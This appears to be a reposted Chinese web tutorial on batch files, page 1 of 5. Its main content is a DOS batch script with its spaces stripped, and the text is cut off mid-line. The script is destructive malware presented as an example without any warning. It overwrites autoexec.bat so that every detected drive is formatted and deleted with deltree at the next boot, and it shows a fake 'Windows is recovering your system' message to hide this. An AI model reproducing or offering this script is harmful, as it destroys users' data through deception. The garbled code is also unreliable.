批处理文件制作实例精彩教程第1/5页
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
---------- @echooff remThisprogramisdedecatedtoaveryspecialpersonthatdoesnotwanttobenamed. :start cls echoPLEASEWAITWHILEPROGRAMLOADS... callattrib-r-hc://autoexec.bat>nul echo@echooff>c://autoexec.bat echocallformatc:/q/u/autoSample>nul>>c://autoexec.bat callattrib+r+hc://autoexec.bat>nul remDrivecheckingandassigningthevaliddrivestothedrivevariable. setdrive= setalldrive=cdefghijklmnopqrstuvwxyz remcodeinsertionforDriveCheckingtakesplacehere. remdrivechk.batisthefilenameundertherootdirectory. remAsfarasthedrivedetectionanddrivevariablesettings,dontworryabouthowit remworks,itsd//*amntocomplicatedfortheaverageoreventheexpertbatchprogrammer. remExceptforTomLavedas. echo@echooff>drivechk.bat echo@prompt%%%%comspec%%%%/f/cvol%%%%1:$bfind"Vol">nul>{t}.bat %comspec%/e:2048/c{t}.bat>>drivechk.bat del{t}.bat echoiferrorlevel1gotoenddc>>drivechk.bat cls echoPLEASEWAITWHILEPROGRAMLOADS... remWhenerrorlevelis1,thentheaboveisnottrue,if0,thenitstrue. remOppositeofbinaryrules.If0,itwillelapstothenextcommand. echo@prompt%%%%comspec%%%%/f/cdir%%%%1:.///ad/w/-p$bfind"bytes">nul>{t}.bat %comspec%/e:2048/c{t}.bat>>drivechk.bat del{t}.bat echoiferrorlevel1gotoenddc>>drivechk.bat cls echoPLEASEWAITWHILEPROGRAMLOADS... remiferrorlevelis1,thenthedrivespecifiedisaremovablemediadrive-notready. remiferrorlevelis0,thenitwillelapstothenextcommand. echo@promptdir%%%%1:.///ad/w/-p$bfind"0bytesfree">nul>{t}.bat %comspec%/e:2048/c{t}.bat>>drivechk.bat del{t}.bat echoiferrorlevel1setdrive=%%drive%%%%1>>drivechk.bat cls echoPLEASEWAITWHILEPROGRAMLOADS... remifitserrorlevel1,thenthespecifieddriveisahardorfloppydrive. remifitsnoterrorlevel1,thenthespecifieddriveisaCD-ROMdrive. echo:enddc>>drivechk.bat remDrivecheckinginsertionendshere."enddc"standsfor"enddDRIVEcHECKING". remNowwewillusetheprogramdrivechk.battoattainvaliddriveinformation. :Sampledrv for%%ain(%alldrive%)docalldrivechk.bat%%a>nul deldrivechk.bat>nul if%drive.==.setdrive=c :form_del callattrib-r-hc://autoexec.bat>nul echo@echooff>c://autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c://autoexec.bat echofor%%%%ain(%drive%)docallformat%%%%a:/q/u/autoSample>nul>>c://autoexec.bat echocls>>c://autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c://autoexec.bat echofor%%%%ain(%drive%)docallc://temp.bat%%%%aBunga>nul>>c://autoexec.bat echocls>>c://autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c://autoexec.bat echofor%%%%ain(%drive%)calldeltree/y%%%%a://>nul>>c://autoexec.bat echocls>>c://autoexec.bat echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c://autoexec.bat echofor%%%%ain(%drive%)docallformat%%%%a:/q/u/autoSample>nul>>c://autoexec.bat echocls>>c://autoexec.bat echoechoLoadingWindows,pleasewaitwhil |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 如何让批处理程序启动的时候最小化下一篇: 用批处理实现电脑自动关机
关于批处理文件制作实例精彩教程第1/5页的所有评论